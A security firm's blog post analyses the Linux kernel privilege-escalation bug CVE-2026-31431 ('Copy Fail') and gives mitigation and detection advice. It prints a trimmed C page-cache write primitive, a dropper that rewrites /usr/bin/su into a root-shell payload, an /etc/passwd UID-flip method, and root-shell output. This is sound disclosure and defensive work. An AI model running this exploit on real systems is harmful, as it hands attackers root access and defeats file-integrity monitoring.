This post is written by Milot Shala, Cybersecurity Director at ANIMARUM, a Red Team Lead and Offensive Security Architect with 25 years of experience across enterprise security, cloud infrastructure, and adversary simulation. This is a part of In the Field series of blog posts.
Note: All testing described in this post was conducted on systems we own or were authorized to test. The exploit code referenced is publicly disclosed by the original researchers, Theori and Xint, at https://copy.fail.
Theori and Xint disclosed Copy Fail on April 29, 2026. We followed the disclosure that morning, pulled the public proof-of-concept, and re-ran it against two of our own lab boxes the same day. Ubuntu 24.04 on AWS, and Amazon Linux 2023. Same primitive, same payload, same outcome on both. An unprivileged shell account becomes a root shell in under a minute. The on-disk inode of every file we touched is unchanged. Tripwire would not have noticed. AIDE would not have noticed. We would not have noticed either, if we were not the ones running the exploit.
We want to start this one with two numbers. Nine, and four. Nine years between the day this bug was introduced and the day someone reported it. Four bytes per write, walked across the page cache of any file we can open read-only. That is the entire shape of CVE-2026-31431. There is no race condition, no memory corruption, no per-distribution offset table. Just a logic flaw at the intersection of three legitimate kernel features that have all been doing exactly what they were designed to do since 2017.
What Copy Fail Is
CVE-2026-31431 is a local privilege escalation in the Linux kernel, scored CVSS 7.8 by CERT-EU's Security Advisory 2026-005. The vulnerable code lives in algif_aead, the AEAD half of the kernel's userspace crypto socket interface (AF_ALG). Any unprivileged user with a shell on an affected host can use it to write four chosen bytes at a chosen offset into the page cache of any file the user can open read-only. With enough four-byte writes, the user can replace the cached image of /usr/bin/su with their own static ELF and then execute it. The kernel still grants effective uid 0 because the on-disk inode is untouched and still setuid root. That is the entire chain.
The affected window opens at kernel commit 72548b093ee3 (August 2017, v4.14, the AF_ALG iov_iter rework that made the file-page write primitive reachable via splice) and closes at commit a664bf3d603d (April 2026, the revert of the 2017 in-place AEAD optimization). Theori's disclosure confirms the bug across the cloud-image kernels of Ubuntu 24.04 LTS (6.17.0-1007-aws), Amazon Linux 2023 (6.18.8-9.213.amzn2023), RHEL 10.1 (6.12.0-124.45.1.el10_1), and SUSE 16 (6.12.0-160000.9-default). Our own re-test was narrower. We re-ran the public vulnerability checker against two lab boxes matching the first two of those configurations, Ubuntu 24.04 LTS and Amazon Linux 2023, and both came back vulnerable exactly as documented. Debian, Arch, Fedora, Rocky, Alma, Oracle, and the embedded crowd are all in the same window. Distribution backports started rolling out alongside disclosure on April 29, but as of the CERT-EU advisory the next day, no major enterprise distribution had a fixed kernel package shipped.
The discovery story is its own kind of warning. Theori's Taeyang Lee aimed an automated analysis tool at AF_ALG plus splice as an underexplored attack surface and got Copy Fail back as the highest-severity finding in roughly an hour. The bug had been there for nine years.
The Three Features That Built the Bug
To understand why Copy Fail exists, we have to walk through three pieces of the kernel that work fine on their own and become a four-byte write primitive when they meet in the wrong order.
The first is AF_ALG. This is the address family that exposes the kernel's crypto API to userspace as a socket. An unprivileged process can socket(AF_ALG, SOCK_SEQPACKET, 0), bind to a named cipher, push a key, and request encrypt or decrypt operations through normal socket I/O. There is no capability check on the cipher selection. Any user can request any cipher template the kernel knows about, including the ones that were originally built for IPsec.
The second is splice(). The splice syscall moves bytes between two file descriptors without ever copying them into userspace. When the source is a file backed by the page cache, splice does not duplicate the bytes; it hands the kernel a reference to the actual page-cache pages. That zero-copy property is exactly what splice was added for. It is also what makes Copy Fail possible, because it lets an unprivileged caller deliver page-cache pages of a setuid binary into the destination scatterlist of a crypto operation. The pages stay live, real, mapped, and writable from the kernel's perspective.
The third is the authencesn AEAD template. AEAD stands for Authenticated Encryption with Associated Data. The authencesn variant is a composite cipher built specifically for IPsec's Extended Sequence Number support: it authenticates the associated data, encrypts the plaintext, and rearranges a 32-bit ESN sequence number across the buffer because the IPsec wire format requires that rearrangement. The rearrangement is implemented as four-byte scratch writes into the destination buffer, using scatterwalk_map_and_copy(). Under normal IPsec use, the destination buffer is a freshly allocated kernel page that no one cares about until the operation completes. The scratch writes are invisible.
Each of these three features is reasonable in isolation. AF_ALG is a clean way to expose hardware crypto offload. Splice is a high-performance zero-copy primitive. Authencesn is a correct implementation of IPsec ESN. The bug is in the geometry of how they meet.
The 2017 Optimization That Made the Geometry Wrong
In August 2017, the kernel's algif_aead got an in-place optimization. The change set the request's source and destination scatterlists to the same chain: req->src = req->dst. The reasoning was straightforward. AEAD operations on socket buffers were already working out-of-place on memory the kernel allocated; doing it in place saved an allocation and a copy. Performance went up. Nothing visibly broke.
What that optimization did, in combination with splice and authencesn, was give an unprivileged process a way to ask the kernel to perform a four-byte write into the page cache of a file the process can only open read-only. The chain looks like this. The user opens the target setuid binary read-only. The user binds an AF_ALG socket to authencesn(hmac(sha256),cbc(aes)) and pushes any key (the values do not matter; the kernel only needs setkey to succeed). The user calls splice twice: once to move the binary's page-cache pages into a pipe, and a second time to move them from the pipe into the AF_ALG operation socket. Because of the 2017 optimization, those page-cache pages now sit in both the source and the destination scatterlist of the pending decrypt request. When the user calls recv() to trigger the decrypt, authencesn's ESN rearrangement code performs its scratch writes. Four of those writes land at a controlled offset, with controlled values, into the live page-cache pages of the target binary. The decrypt subsequently fails authentication and returns an error. The error does not matter. The four bytes are already there.
The on-disk file is untouched. The next process that reads or executes that file sees the mutated page-cache image. That is Copy Fail.
Building the Primitive
The shared mutation primitive lives in utils.c of the public C port of the exploit, written by Tony Gies as a portable reimplementation of Theori's original Python proof-of-concept. It is roughly 100 lines and worth reading in full, because the whole vulnerability collapses into one function. Here is the working core, with the boilerplate trimmed:
int patch_chunk(int file_fd, off_t offset,
const unsigned char four_bytes[4]) {
int ctrl_sock = socket(AF_ALG, SOCK_SEQPACKET, 0);
struct sockaddr_alg sa = { .salg_family = AF_ALG };
memcpy(sa.salg_type, "aead", 5);
memcpy(sa.salg_name, "authencesn(hmac(sha256),cbc(aes))",
sizeof "authencesn(hmac(sha256),cbc(aes))");
bind(ctrl_sock, (struct sockaddr *)&sa, sizeof sa);
setsockopt(ctrl_sock, SOL_ALG, ALG_SET_KEY,
AUTHENC_KEY, sizeof AUTHENC_KEY);
setsockopt(ctrl_sock, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL, 4);
int op_sock = accept(ctrl_sock, NULL, 0);
size_t splice_len = (size_t)offset + 4;
unsigned char aad[8] = {
'A', 'A', 'A', 'A',
four_bytes[0], four_bytes[1], four_bytes[2], four_bytes[3],
};
/* sendmsg pushes the AAD plus the cmsg control headers
(ALG_SET_OP=ALG_OP_DECRYPT, ALG_SET_IV, ALG_SET_AEAD_ASSOCLEN=8)
with MSG_MORE so the kernel waits for the plaintext. */
int pipefd[2]; pipe(pipefd);
off_t src_off = 0;
splice(file_fd, &src_off, pipefd[1], NULL, splice_len, 0);
splice(pipefd[0], NULL, op_sock, NULL, splice_len, 0);
unsigned char *sink = malloc(8 + (size_t)offset);
recv(op_sock, sink, 8 + (size_t)offset, 0);
free(sink);
/* close everything */
return 0;
}
The aad buffer is the entire payload control surface. The first four bytes are filler associated data. Bytes four through seven are the four bytes that get written into the target's page cache. The splice length is offset + 4, which positions the authencesn scratch write at the chosen offset in the destination. The recv at the end is what actually triggers the decrypt; the kernel performs the operation, authentication fails, the decrypt is rejected, and the four bytes have already been written. Everything else in the function is plumbing.
To overwrite an arbitrary span of bytes, the caller walks patch_chunk() across the target in four-byte windows. To overwrite a 250-byte payload, that is roughly 63 calls. On the systems we tested, the whole loop completes in well under a second.
Cashout One: The /etc/passwd UID Flip
The first cashout we tried was the cleanest in spirit. /etc/passwd is world-readable on every standard Linux system. Its layout is fixed: name:x:UID:GID:gecos:home:shell. If we can mutate four bytes of its page cache, we can change a four-digit UID in our own line to 0000, then trigger any code path that resolves users via getpwnam or getpwuid and acts on the resolved uid. Done correctly, that is a root shell with no embedded payload at all.
The exploit-passwd.c variant locates the UID field for the running user, sanity-checks that the four bytes at that offset match the current uid (so we know the offset math is right), runs patch_chunk() with "0000" as the new value, and then execs su <user> to ride PAM into a root shell. PAM authenticates against /etc/shadow, which we have not touched; the user's real password works. After authentication, su's setuid() reads the corrupted uid from the page-cache /etc/passwd and lands the caller in uid 0.
This worked on the box running util-linux's su. It failed on the box running shadow-utils' su with this message:
su: Cannot determine your user name.
The diagnosis is small but exact. Shadow-utils' su does a caller-identity cross-check before authentication: it calls getpwuid(getuid()) and rejects the operation if the returned passwd entry's uid does not match the kernel's view of the calling uid. Our mutation broke that cross-check. The kernel still saw us as our original uid (the kernel's view comes from the credential structure on the calling process, not from /etc/passwd), but getpwuid() now returned the corrupted entry with uid 0. The mismatch triggered the rejection. The page-cache mutation was successful. The cashout was not.
Two paths forward from there. One is to pivot to another consumer of getpwnam/getpwuid that does not cross-check, of which there are many on a typical system: WSL2 session spawn, several MTAs during local delivery, sshd with StrictModes disabled, and so on. The other is to abandon the /etc/passwd route entirely and switch to mutating a setuid binary directly. We took the second option because it was the more universal of the two, and because we wanted to confirm the binary-mutation variant worked end-to-end on both test targets.
Cashout Two: The Binary Mutation
The binary-mutation variant overwrites the cached image of a setuid root binary with our own payload, then execs the binary. The kernel grants effective uid 0 because the on-disk inode is still setuid root. Then the kernel loads what it thinks is the binary's text into memory. What it loads is the page-cache pages we just rewrote.
The payload itself is portable C against the kernel's vendored nolibc:
#include "nolibc/nolibc.h"
int main(void) {
char *argv[] = { "sh", (char *)NULL };
char *envp[] = { (char *)NULL };
syscall(__NR_setgid, 0);
syscall(__NR_setuid, 0);
execve("/bin/sh", argv, envp);
return 1;
}
Built against nolibc with -nostdlib -static -ffreestanding, this lands at roughly 1.7 KB on x86_64 and around 2.0 KB on aarch64, versus several hundred kilobytes for the same code linked against glibc-static. The dropper embeds the built ELF as a single relocatable object via ld -r -b binary -o payload.o payload, which gives it three synthesized symbols (_binary_payload_start, _binary_payload_end, _binary_payload_size) it can index directly.
The dropper itself, with the boilerplate cut, is twenty lines:
int main(int argc, char **argv) {
const char *target = (argc > 1) ? argv[1] : "/usr/bin/su";
int file_fd = open(target, O_RDONLY);
size_t len = PAYLOAD_LEN;
for (off_t off = 0; (size_t)off < len; off += 4) {
unsigned char window[4] = { 0, 0, 0, 0 };
size_t take = (len - (size_t)off >= 4) ? 4 : len - (size_t)off;
memcpy(window, PAYLOAD + off, take);
patch_chunk(file_fd, off, window);
}
close(file_fd);
execl("/bin/sh", "sh", "-c", "su", (char *)NULL);
return 1;
}
Open the target. Walk the embedded payload in four-byte windows, call patch_chunk() for each. Exec su through /bin/sh -c. The kernel reads the corrupted text pages from the page cache, sees a setuid-root inode, hands the process root credentials, and runs the payload. The payload calls setgid(0), setuid(0), and execve("/bin/sh", ...).
The Shell
$ id
uid=1000(testuser) gid=1000(testuser) groups=1000(testuser)
$ ./exploit
[+] target: /usr/bin/su
[+] payload: 1696 bytes (424 iterations)
[+] page cache mutated; exec'ing target
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux ip-10-0-1-42 6.17.0-1007-aws #7-Ubuntu SMP ...
No race. No retry. No grooming. Run the dropper, get a root shell. The on-disk inode of /usr/bin/su is byte-for-byte identical to the package version. sha256sum /usr/bin/su returns the same hash before and after. Tripwire and AIDE would both report nothing. The corruption lives only in the page cache, and the page cache will eventually evict it back to disk-backed truth as memory pressure rises or as echo 3 > /proc/sys/vm/drop_caches is run. The window of detection is the window of behavior, not the window of state.
Why This One Matters
Three things make Copy Fail worth understanding past the mechanics of the bug itself.
The first is the latency. The 2011 commit that added authencesn was correct. The 2015 commit that added AF_ALG AEAD support was correct. The 2017 commit that turned the AEAD path in-place was correct. None of them were dangerous in isolation. The bug is the geometry of all three together, and that geometry sat unexamined for nine years across every major distribution. The discovery did not require a new vulnerability class. It required someone to look at AF_ALG plus splice as an attack surface and think about what kind of memory was reachable through it. Theori's automated analysis flagged it in roughly an hour. We do not believe the entire delta was time-on-machine. We believe the delta was attention.
The second is the failure of file-integrity tooling against this bug class. Tripwire, AIDE, OSSEC's syscheck, Wazuh's FIM module, Microsoft Defender for Endpoint's file integrity monitoring on Linux, and Falco's drift-detection rules all assume that if the on-disk inode is unchanged, the file's behavior is unchanged. Copy Fail breaks that assumption directly. The on-disk file is the unchanged file. The running file is something else. Detection has to move from disk-state diffing to runtime behavior, which is a much harder problem and one that very few enterprise environments have actually solved.
The third is the container blast radius. The page cache is not partitioned by namespace. Two containers running on the same kernel that read the same file see the same cached pages. If either of them is unprivileged enough to bind an AF_ALG socket and call splice on a host-mounted file (which is the default unless seccomp explicitly denies AF_ALG), it can mutate the page cache that the other container sees on its next read. The same primitive that gets a local user to root inside one VM gets a malicious pod to root across pods on a Kubernetes node. Multi-tenant Kubernetes operators should be reading the disclosure as a node-escape primitive, not as a userland LPE.
On both lab boxes, the full dropper completed in well under a second against /usr/bin/su. A typical CI runner is the same operational shape: a host with algif_aead loaded, hundreds of unattended jobs per day, and no reason for any of them to bind an AF_ALG socket. None of them are inspected at runtime to confirm they have not. The exposure is entire.
What to Do
Patch the kernel as soon as your distribution ships the backport of a664bf3d603d. Until then, disable the algif_aead module persistently and unload it from the running kernel:
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead 2>/dev/null || true
Per CERT-EU Security Advisory 2026-005, this does not affect dm-crypt or LUKS, kTLS, IPsec/XFRM, OpenSSL, GnuTLS, NSS, or SSH; the only consumer it breaks is software explicitly configured to use the OpenSSL afalg engine, which is rare in modern deployments. On containerized workloads, block AF_ALG socket creation via seccomp at the runtime layer; this prevents exploitation even on unpatched kernels and is appropriate as a permanent baseline regardless of patch state. The Docker default seccomp profile and the Kubernetes RuntimeDefault profile should both be reviewed for AF_ALG handling.
Audit the assumptions of any file-integrity tooling in the environment. If a tool reports on the basis of inode hashes, on-disk read-back, or filesystem audit events, it cannot see Copy Fail. Document that gap explicitly. Where runtime file-behavior monitoring is feasible, move it up the priority list. Where it is not feasible, accept that this class of bug is invisible to your current detection stack and prioritize the patch accordingly.
Treat Kubernetes nodes and CI/CD runners as the highest-priority remediation targets. They run the most untrusted code per host and have the largest blast radius if a single tenant escapes.
Run This in CI Today
Any fleet running Linux kernels from 2017 onward is in scope. The only way to know whether a given host is vulnerable is to exercise the kernel path. Distribution backports do not bump uname -r, so a version-based heuristic produces false negatives. The check has to actually trigger the bug, against a target that is safe to mutate.
To make that easy to run anywhere we built a small Python detector. It is non-destructive: it creates a temporary file, drives the AF_ALG plus splice primitive against the file's own page cache, reads the file back, and exits 100 if the bytes were rewritten or 0 if they were not. It never touches /usr/bin/su, /etc/passwd, or any file the script did not create itself. The temp file is unlinked on exit and the page-cache mutation evaporates with the inode.
The whole detector is one file of roughly 150 lines of well-commented Python with no third-party dependencies. The source lives at github.com/ANIMARUM-Cyber/copy-fail-check. Read it before you run it.
For an ad-hoc check on any Linux box with Python 3.10 or later:
curl -fsSL https://raw.githubusercontent.com/ANIMARUM-Cyber/copy-fail-check/main/check.py | python3 -
For native GitHub Actions integration, the same detector ships as a composite action that fails the workflow when the runner kernel is vulnerable:
- name: Check runner kernel for Copy Fail (CVE-2026-31431)
uses: ANIMARUM-Cyber/copy-fail-check@v1
Exit codes are stable across both forms. 100 means vulnerable, 0 means not vulnerable or the AF_ALG path is structurally blocked in this environment, and 1 means the detector itself failed to run. Tooling that consumes the result should branch on those three values rather than parse stdout.
The CI check is the right tool for the runner you are about to build on. For continuous coverage of the fleet behind it, including assets that drift back into exposure as new images are baked and as patch state changes underneath you, that is what we built StacIntel for. https://stacintel.se
The Close
For nine years, three legitimate kernel features did exactly what they were designed to do. The bug was in the spaces between them. The on-disk file did not change. The kernel changed its mind about who you were.
Four bytes at a time. That was the entire exploit.